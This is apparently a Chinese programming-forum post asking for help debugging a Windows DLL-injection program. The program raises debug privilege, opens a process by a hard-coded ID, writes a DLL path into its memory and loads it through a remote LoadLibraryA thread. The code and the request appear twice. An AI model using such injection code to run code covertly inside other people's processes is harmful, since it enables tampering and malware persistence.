6,871
社区成员
发帖
与我相关
我的任务
分享DLL 注入文章,需修改一些部分
#include "stdio.h"
#include "windows.h"
void Enable();
char name[]="c:\\a.dll";
void main()
{
Enable();
int cb=(1+strlen(name))*sizeof(char);
HANDLE h=OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE,FALSE,224);
if(h==NULL)
{
printf("open remote process error ! %d\n",GetLastError());
return;
}
char * pRemoteM=(char *)VirtualAllocEx(h,0,cb,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE );
if(pRemoteM==NULL)
{
printf("VirtralAllocEx error ! %d\n",GetLastError());
return;
}
BOOL r=WriteProcessMemory(h,pRemoteM,name,cb,0);
if(r==FALSE)
{
printf("WriteProcessMemory error ! %d\n",GetLastError());
return;
}
LPTHREAD_START_ROUTINE RemoteThread=(LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32"),"LoadLibraryA");
if(RemoteThread==NULL)
{
printf("GetProcAddress error ! %d\n",GetLastError());
return;
}
DWORD receive;
HANDLE hRemote=CreateRemoteThread(h,0,0,RemoteThread,pRemoteM,0,&receive);
if(hRemote==NULL)
{
printf("CreateRemoteThread error ! %d\n",GetLastError());
return;
}
}
void Enable()
{
HANDLE hToken;
LUID sedebugnamevalue;
TOKEN_PRIVILEGES tkp;
if ( ! OpenProcessToken( GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
return;
if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnamevalue ) ){
CloseHandle( hToken );
return;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnamevalue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if ( ! AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) )
CloseHandle( hToken );
}
经过编译运行,可以远程插入线程,存在如下问题:
1。第一次插入运行正常,以后再插入的线程就没反应了
2。线程被插入远程进程后,执行了之后不退出?在任务管理器上看到线程仍然还在
解决了这两个问题后,该程序就可以正常使用了,希望大家在上面修改一下!:)
#include "windows.h"
void Enable();
char name[]="c:\\a.dll";
void main()
{
Enable();
int cb=(1+strlen(name))*sizeof(char);
HANDLE h=OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE,FALSE,224);
if(h==NULL)
{
printf("open remote process error ! %d\n",GetLastError());
return;
}
char * pRemoteM=(char *)VirtualAllocEx(h,0,cb,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE );
if(pRemoteM==NULL)
{
printf("VirtralAllocEx error ! %d\n",GetLastError());
return;
}
BOOL r=WriteProcessMemory(h,pRemoteM,name,cb,0);
if(r==FALSE)
{
printf("WriteProcessMemory error ! %d\n",GetLastError());
return;
}
LPTHREAD_START_ROUTINE RemoteThread=(LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32"),"LoadLibraryA");
if(RemoteThread==NULL)
{
printf("GetProcAddress error ! %d\n",GetLastError());
return;
}
DWORD receive;
HANDLE hRemote=CreateRemoteThread(h,0,0,RemoteThread,pRemoteM,0,&receive);
if(hRemote==NULL)
{
printf("CreateRemoteThread error ! %d\n",GetLastError());
return;
}
}
void Enable()
{
HANDLE hToken;
LUID sedebugnamevalue;
TOKEN_PRIVILEGES tkp;
if ( ! OpenProcessToken( GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
return;
if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnamevalue ) ){
CloseHandle( hToken );
return;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnamevalue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if ( ! AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) )
CloseHandle( hToken );
}
经过编译运行,可以远程插入线程,存在如下问题:
1。第一次插入运行正常,以后再插入的线程就没反应了
2。线程被插入远程进程后,执行了之后不退出?在任务管理器上看到线程仍然还在
解决了这两个问题后,该程序就可以正常使用了,希望大家在上面修改一下!:)
...全文
请发表友善的回复…
发表回复
